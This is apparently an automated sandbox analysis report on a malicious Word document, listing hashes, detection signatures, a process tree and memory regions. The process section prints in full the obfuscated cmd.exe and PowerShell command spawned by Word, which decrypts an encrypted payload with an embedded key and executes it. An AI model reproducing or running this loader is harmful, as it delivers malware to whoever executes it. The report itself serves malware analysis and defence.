Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    12-05-2024 04:00

General

  • Target

    38256f1877e291236a7c01ecceec7786_JaffaCakes118.doc

  • Size

    145KB

  • MD5

    38256f1877e291236a7c01ecceec7786

  • SHA1

    024e3fcdcacb942f9bb01311c4383fdb022d89d9

  • SHA256

    fd79de4082ddd5855e8589bf379265cd31c83375bcce845eeae720d1f126f210

  • SHA512

    058093c6265f931c2e862462ccb2cb519074174be5fadf9736b84e478e55b3a350a8e6b717ef24f3ea1e00aaa2fa7891487e5b070f806d558fe555fca3543f80

  • SSDEEP

    1536:QqfejieBS2ac0W+ah3a0DSia8OhVhZBkhJHMLLgklDVV+d0Lu2EUkGpWoZ8Rn95R:Qjiev3DTalfrBtHQd+pWEoy5qoiWZKVD

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\38256f1877e291236a7c01ecceec7786_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3044
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd pvCrTdftvMXdwS nXauNEvMhBUwkrKpJz tKGfOBQt & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %pnLPHuLiQjsHsCO%=wqiJAjOYRN&&set %YjowfUzQ%=p&&set %EXLoFEuzA%=o^w&&set %UoToljwEjCmERRw%=AuYZQCrJ&&set %FkkJrzwFYqwf%=!%YjowfUzQ%!&&set %HwNWTGZmzuaXKbu%=LoTMnuZM&&set %KVMEBNR%=e^r&&set %tIkipzTBWS%=!%EXLoFEuzA%!&&set %vzIVSbE%=s&&set %KqiUArzRwJhnSZl%=dzGXrazZzMO&&set %MvAviUXhjIEhZG%=he&&set %pTvIpLbmjNQESH%=ll&&!%FkkJrzwFYqwf%!!%tIkipzTBWS%!!%KVMEBNR%!!%vzIVSbE%!!%MvAviUXhjIEhZG%!!%pTvIpLbmjNQESH%! " ( [rUNtiMe.InteROPsERViCeS.MARShAL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaABFAFQAaQBaAFgATQBMAFgATQBrADkAVwBxAGcAPQA9AHwAMgA4AGIAYgBlADUAYgBiAGIAZAA5ADUANQBmADkAMwBhADUAMgA4ADEAMAAyADkAZgBkADYAMwA1AGIANABkAGIAYQA3ADUAYQBiAGIANQAyADUAYgBlAGYAMwBhAGIANgBiAGMAOQA0AGYAMwA3ADcAZgBjAGEANAAzAGMANQBiADAAMgBkAGQAOQAzAGIAMwAwAGIAZABmADUANwBhADUAYwA4ADUAOAA3AGIAZgA1ADUAYwA3ADEAYwAyADgAMQA0ADIAYgBmADEAYwA4AGMAZABlAGYAZgBkADQAZQA1ADYAMAA1ADcAMAA0ADMANABhAGIAMAA1AGIAYwA0ADAAYQBkAGMAYQAyADEAZAA1ADkAMgA3ADMAMAA5AGYAYwBlAGIAMABlADgAMABlAGEAMwA4AGIANABhAGYAYQAxADEAYQAxAGIAZQBmADIAOAAzADIAYQA2ADIAOQA5AGIAYQA5ADcAMwBhADEANwBhAGEAMQBmADAAMgA2AGEAOQBhAGYAMAAyAGEAZAAyADAANQBkAGUAOQBmADQANQBhADEAZQAzADUAZgA2ADcAOQA1AGEAMwBkAGYAYwBjADkANABkADAANgBlADkAYwAwADMANgBkADEANQA3AGIAZQAwAGEAMQA5AGIAYgA5AGYAZAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxADIAZgA3ADYAZgA4ADQANABjADgAMwA5AGIAMgBmADEAZABkAGIANAA2ADIAYQA4ADMAZgAzADEANQA1ADUAYQA0ADIAMAAyADUAYwBjADUAYwBkADkAYgAyADkAYwA0AGQAZQA3ADAAMQBmAGMAMABjAGEAOQBmADMANwAxAGYAYwAzADkAMQA0AGQAYwAzADEAMAAxADUAMwAxADYAOQAwAGEANABiADEANQBiADYAMwA3ADgAZAAzAGIANQBmADYAZQA5AGUAOQBiADIAZABiADMANgA2AGEAMABjADgAOQA5ADIANwAzADUAZAA4AGEANgAyADgAMwBlADEANQA0AGMAMABjAGIAMABlAGYAYQBjAGEANQA5ADcAMwAwAGEAYwAxADEANwA0AGIAMAAxADEAMwAxADMAOABkAGUAMgA0AGYAYgAxADAAYwA4ADIAYgBlAGEAZAA5AGYAZQA0ADYANgA0ADEAOQBlADgAMwBiAGEAOAA0AGEAMwBhAGEANAAyADcAMQAyADQANQA0AGUAMQAxADAAYgAzAGIAMQAzADIAYgBkAGYAMgA3AGUAYgA3ADIAYgBiADEAYwBiADMAZQBkADAAOAA1ADMAYwBiADAAMwA0ADUANwBkADEAOQA4ADYAZQA3AGMAMABhADYAMwBjADcAYQA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAA1AGYAOQA3AGMAMwA1AGYAMwBjAGUAZABiAGUANgA3ADMANwBmADIANAA2AGYAMQAwADMAZAAzADAAMAA4ADUAYwA1AGEAZgBlADcAYwA3AGMAZQA4ADMAZAAwAGYAYgA3ADMAYgBlADgAYwBmADkAZQA0AGQAOQAzADUAZAA2ADIAOAAxAGMAYgAzADMAZgAwADIANgBhAGMAYQBhADkAOQA2AGMANwAzAGEAYgBjADUANQAyAGMAMgA5ADYAMQA4ADQAYQBkADcAMwBkADYANAAwADgAZAA4ADEAMQBhADcAOAA4ADUAMgAxADkAMgA1ADUANAA4ADEAZAA0ADIAZgAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIANwAyADQAOAAzAGUANgA0AGIAYwA1ADEAMgBhAGQANwA5AGIAZQAxAGIAOAA1AGQAMAA3AGEAMwA4AGQAMABhAGEANQA0AGEAMgAxADYAMgBlAGQAYgA5AGYAOQA3AGYAZQBiAGUAZQA0ADIANABkADUAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmADgAYQBiADQANwBhADYAMgAxAGUAZQA2AGMAMABkADEAZgBlAGUAZgA0ADYAZABkAGIANQA3AGEANgAwAGIAMQA1ADgAZQBkADEANgA2AGEAOQAxADIANABkADMAZgBlAGMAMAA5ADkANQBiADYANwAyAGYAYwAzAGMAMQBlADcAYgAyADIANQBkADQAZABiADgAZQBhADIANABhADcAMwBmADkAMABiAGMAMQA0ADgANgA1ADEAYwA4ADAANgAxAGIANAAwADAAZgA5ADQAOQBhAGMANQAzAGIAMgBmADUAYQBkADIAYwA4ADUAZQAxADUAZQA1ADIAMQA1AGEAMgAzAGEANwAzADkAYwA5AGUAZQA4AGUAYwAwAGIAOAAyAGQAOQBjAGQANwBiAGUAOQA4ADAAMwA0AGIANwBlAGQAOAA4ADQANQBhAGEAOQAyADcAYgA3AGQANgAzADkAOQBmADMANwA5ADIAYwBmAGUAZgA5AGMAZAA1ADIAYgA5ADUANgAwADgAZgBmAGYANAAwAGIANQAyAGUAOAAyADgAOAA1ADYAYgAxAGUAMgA3ADMANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEAOAA2ADAAYwA3AGIAYwA3ADcAZgA3AGYAOAAwAGIAMgA2ADUANwBiADcANQA4ADQAMQAzAGEAOQA2AGQAYwBjAGEAZABkADcAYgAzAGQAMgBkAGUANQAxAGYAZgBjAGEAMAA0ADEANQA0ADAAMABkAGMAOQBiAGYAYQAyAGIANgA3ADEAMQBmADkAZgA3AGUAYgA4ADUAYQA0ADgAMAA3ADMAYQBiADAAZABjADAAYQBiAGYAOABhADEANQAxAGUAZQBiAGYAYwBlADgAZgA3AGQAMgAwAGYAZgA5ADQAZAA3ADEANABiADcANAAwAGIAZAA0ADEAMgBhADQAYQBkAGMANAAxADEAZQA3AGUANAA5ADcAOABlADcAOAA0AGUAMQBlADIAOQAxADYAZgA5ADcAZABhADcAOQA4AGUANQBiAGMANwA0ADcAZQA2ADgANAA3ADcANwBiADgAYQBmADcANAA5ADMAZQBlADMAMABjADMANQA5ADIANgA1AGMAYQBjAGYANgBlAGUANQA2ADQAYQBmAGYAMQBmADYAMAAxADQAMQAzAGYAOQA5AGIAMABhADYAOQA1ADEAZgBkAGEAMQBjADMAMwAwADUAMAA2ADgAMwAyADUAMQBhADYANwBkADcAZAA0ADAAYQBhADUAMQBmADEAOABlADQAOQBhADYAMgAxADgAZAA0ADQAMgBmAGQAYQAxAGUAOAAxADEAYgBhADcANABkADIAZQAxAGIAMAA3AGUANAA0ADgAZgA5ADEAOQA5ADUAZABmAGQAMQA5AGMANAAwAGMAMQA0ADYAYQA5AGMAZQA2AGUANABiADkAMgAyADkAYwAyADgAYQAyAGUAMgAyAGUANgBkADUAYgA2ADEAMQBjAGEANAA5AGIANgBhADUAZQBmADAAOABmADcAMgA4ADAAOAAwAGIAZgBlADcAMwAzAGEAMQAzAGYAMwBmAGEAZQBhADYAMAA3AGUAOABjAGYAMwA0ADMAYQAyADkAYQA1AGYAYgBhADcAOQAwAGUANQBjADYAYQBlADIAYwA1ADcANQA4ADQAOAA5ADcAMgAyAGEAZQA0AGEAYwA4ADcAOQAwAGYAMQBiADQAOABjADgANABhADcAZQAxADEAZQAxAGYAZAAzADYAZAA1AGEAMAA2AGIAMAA2AGMANwAyAGIA'|.('conVEr'+'Tto-sECUR'+'es'+'TR'+'i'+'ng') -ke (129..114)) )) )| . ( $SHelLiD[1]+$SHELLiD[13]+'x')
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell " ( [rUNtiMe.InteROPsERViCeS.MARShAL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaABFAFQAaQBaAFgATQBMAFgATQBrADkAVwBxAGcAPQA9AHwAMgA4AGIAYgBlADUAYgBiAGIAZAA5ADUANQBmADkAMwBhADUAMgA4ADEAMAAyADkAZgBkADYAMwA1AGIANABkAGIAYQA3ADUAYQBiAGIANQAyADUAYgBlAGYAMwBhAGIANgBiAGMAOQA0AGYAMwA3ADcAZgBjAGEANAAzAGMANQBiADAAMgBkAGQAOQAzAGIAMwAwAGIAZABmADUANwBhADUAYwA4ADUAOAA3AGIAZgA1ADUAYwA3ADEAYwAyADgAMQA0ADIAYgBmADEAYwA4AGMAZABlAGYAZgBkADQAZQA1ADYAMAA1ADcAMAA0ADMANABhAGIAMAA1AGIAYwA0ADAAYQBkAGMAYQAyADEAZAA1ADkAMgA3ADMAMAA5AGYAYwBlAGIAMABlADgAMABlAGEAMwA4AGIANABhAGYAYQAxADEAYQAxAGIAZQBmADIAOAAzADIAYQA2ADIAOQA5AGIAYQA5ADcAMwBhADEANwBhAGEAMQBmADAAMgA2AGEAOQBhAGYAMAAyAGEAZAAyADAANQBkAGUAOQBmADQANQBhADEAZQAzADUAZgA2ADcAOQA1AGEAMwBkAGYAYwBjADkANABkADAANgBlADkAYwAwADMANgBkADEANQA3AGIAZQAwAGEAMQA5AGIAYgA5AGYAZAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxADIAZgA3ADYAZgA4ADQANABjADgAMwA5AGIAMgBmADEAZABkAGIANAA2ADIAYQA4ADMAZgAzADEANQA1ADUAYQA0ADIAMAAyADUAYwBjADUAYwBkADkAYgAyADkAYwA0AGQAZQA3ADAAMQBmAGMAMABjAGEAOQBmADMANwAxAGYAYwAzADkAMQA0AGQAYwAzADEAMAAxADUAMwAxADYAOQAwAGEANABiADEANQBiADYAMwA3ADgAZAAzAGIANQBmADYAZQA5AGUAOQBiADIAZABiADMANgA2AGEAMABjADgAOQA5ADIANwAzADUAZAA4AGEANgAyADgAMwBlADEANQA0AGMAMABjAGIAMABlAGYAYQBjAGEANQA5ADcAMwAwAGEAYwAxADEANwA0AGIAMAAxADEAMwAxADMAOABkAGUAMgA0AGYAYgAxADAAYwA4ADIAYgBlAGEAZAA5AGYAZQA0ADYANgA0ADEAOQBlADgAMwBiAGEAOAA0AGEAMwBhAGEANAAyADcAMQAyADQANQA0AGUAMQAxADAAYgAzAGIAMQAzADIAYgBkAGYAMgA3AGUAYgA3ADIAYgBiADEAYwBiADMAZQBkADAAOAA1ADMAYwBiADAAMwA0ADUANwBkADEAOQA4ADYAZQA3AGMAMABhADYAMwBjADcAYQA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAA1AGYAOQA3AGMAMwA1AGYAMwBjAGUAZABiAGUANgA3ADMANwBmADIANAA2AGYAMQAwADMAZAAzADAAMAA4ADUAYwA1AGEAZgBlADcAYwA3AGMAZQA4ADMAZAAwAGYAYgA3ADMAYgBlADgAYwBmADkAZQA0AGQAOQAzADUAZAA2ADIAOAAxAGMAYgAzADMAZgAwADIANgBhAGMAYQBhADkAOQA2AGMANwAzAGEAYgBjADUANQAyAGMAMgA5ADYAMQA4ADQAYQBkADcAMwBkADYANAAwADgAZAA4ADEAMQBhADcAOAA4ADUAMgAxADkAMgA1ADUANAA4ADEAZAA0ADIAZgAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIANwAyADQAOAAzAGUANgA0AGIAYwA1ADEAMgBhAGQANwA5AGIAZQAxAGIAOAA1AGQAMAA3AGEAMwA4AGQAMABhAGEANQA0AGEAMgAxADYAMgBlAGQAYgA5AGYAOQA3AGYAZQBiAGUAZQA0ADIANABkADUAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmADgAYQBiADQANwBhADYAMgAxAGUAZQA2AGMAMABkADEAZgBlAGUAZgA0ADYAZABkAGIANQA3AGEANgAwAGIAMQA1ADgAZQBkADEANgA2AGEAOQAxADIANABkADMAZgBlAGMAMAA5ADkANQBiADYANwAyAGYAYwAzAGMAMQBlADcAYgAyADIANQBkADQAZABiADgAZQBhADIANABhADcAMwBmADkAMABiAGMAMQA0ADgANgA1ADEAYwA4ADAANgAxAGIANAAwADAAZgA5ADQAOQBhAGMANQAzAGIAMgBmADUAYQBkADIAYwA4ADUAZQAxADUAZQA1ADIAMQA1AGEAMgAzAGEANwAzADkAYwA5AGUAZQA4AGUAYwAwAGIAOAAyAGQAOQBjAGQANwBiAGUAOQA4ADAAMwA0AGIANwBlAGQAOAA4ADQANQBhAGEAOQAyADcAYgA3AGQANgAzADkAOQBmADMANwA5ADIAYwBmAGUAZgA5AGMAZAA1ADIAYgA5ADUANgAwADgAZgBmAGYANAAwAGIANQAyAGUAOAAyADgAOAA1ADYAYgAxAGUAMgA3ADMANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEAOAA2ADAAYwA3AGIAYwA3ADcAZgA3AGYAOAAwAGIAMgA2ADUANwBiADcANQA4ADQAMQAzAGEAOQA2AGQAYwBjAGEAZABkADcAYgAzAGQAMgBkAGUANQAxAGYAZgBjAGEAMAA0ADEANQA0ADAAMABkAGMAOQBiAGYAYQAyAGIANgA3ADEAMQBmADkAZgA3AGUAYgA4ADUAYQA0ADgAMAA3ADMAYQBiADAAZABjADAAYQBiAGYAOABhADEANQAxAGUAZQBiAGYAYwBlADgAZgA3AGQAMgAwAGYAZgA5ADQAZAA3ADEANABiADcANAAwAGIAZAA0ADEAMgBhADQAYQBkAGMANAAxADEAZQA3AGUANAA5ADcAOABlADcAOAA0AGUAMQBlADIAOQAxADYAZgA5ADcAZABhADcAOQA4AGUANQBiAGMANwA0ADcAZQA2ADgANAA3ADcANwBiADgAYQBmADcANAA5ADMAZQBlADMAMABjADMANQA5ADIANgA1AGMAYQBjAGYANgBlAGUANQA2ADQAYQBmAGYAMQBmADYAMAAxADQAMQAzAGYAOQA5AGIAMABhADYAOQA1ADEAZgBkAGEAMQBjADMAMwAwADUAMAA2ADgAMwAyADUAMQBhADYANwBkADcAZAA0ADAAYQBhADUAMQBmADEAOABlADQAOQBhADYAMgAxADgAZAA0ADQAMgBmAGQAYQAxAGUAOAAxADEAYgBhADcANABkADIAZQAxAGIAMAA3AGUANAA0ADgAZgA5ADEAOQA5ADUAZABmAGQAMQA5AGMANAAwAGMAMQA0ADYAYQA5AGMAZQA2AGUANABiADkAMgAyADkAYwAyADgAYQAyAGUAMgAyAGUANgBkADUAYgA2ADEAMQBjAGEANAA5AGIANgBhADUAZQBmADAAOABmADcAMgA4ADAAOAAwAGIAZgBlADcAMwAzAGEAMQAzAGYAMwBmAGEAZQBhADYAMAA3AGUAOABjAGYAMwA0ADMAYQAyADkAYQA1AGYAYgBhADcAOQAwAGUANQBjADYAYQBlADIAYwA1ADcANQA4ADQAOAA5ADcAMgAyAGEAZQA0AGEAYwA4ADcAOQAwAGYAMQBiADQAOABjADgANABhADcAZQAxADEAZQAxAGYAZAAzADYAZAA1AGEAMAA2AGIAMAA2AGMANwAyAGIA'|.('conVEr'+'Tto-sECUR'+'es'+'TR'+'i'+'ng') -ke (129..114)) )) )| . ( $SHelLiD[1]+$SHELLiD[13]+'x')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1016

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      f6e74737e005c998bd3b0391c1e1ea52

      SHA1

      67ccbcdaaed6c66a6c6f7f37b30fde1ceb8e48a0

      SHA256

      809568ada7bf1817f313e72837b8df5f1c041ce995f2201c88cdedd997b10f80

      SHA512

      73eea6bbebba922b5f0d6843fd41a8b3751a800ad298ae29b3fd4d39413185cb75d5fe87de9ba108be669650a38babf759a2d7149ce4b5f6290985ea1b764bec

    • memory/2356-18-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-33-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-17-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-31-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-16-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-36-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-30-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-27-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-26-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-24-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-23-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-15-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-20-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-0-0x000000002FC51000-0x000000002FC52000-memory.dmp

      Filesize

      4KB

    • memory/2356-6-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-2-0x000000007156D000-0x0000000071578000-memory.dmp

      Filesize

      44KB

    • memory/2356-19-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-13-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-11-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-10-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-9-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-8-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-7-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-43-0x000000007156D000-0x0000000071578000-memory.dmp

      Filesize

      44KB

    • memory/2356-44-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-45-0x0000000000740000-0x0000000000840000-memory.dmp

      Filesize

      1024KB

    • memory/2356-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2356-60-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2356-61-0x000000007156D000-0x0000000071578000-memory.dmp

      Filesize

      44KB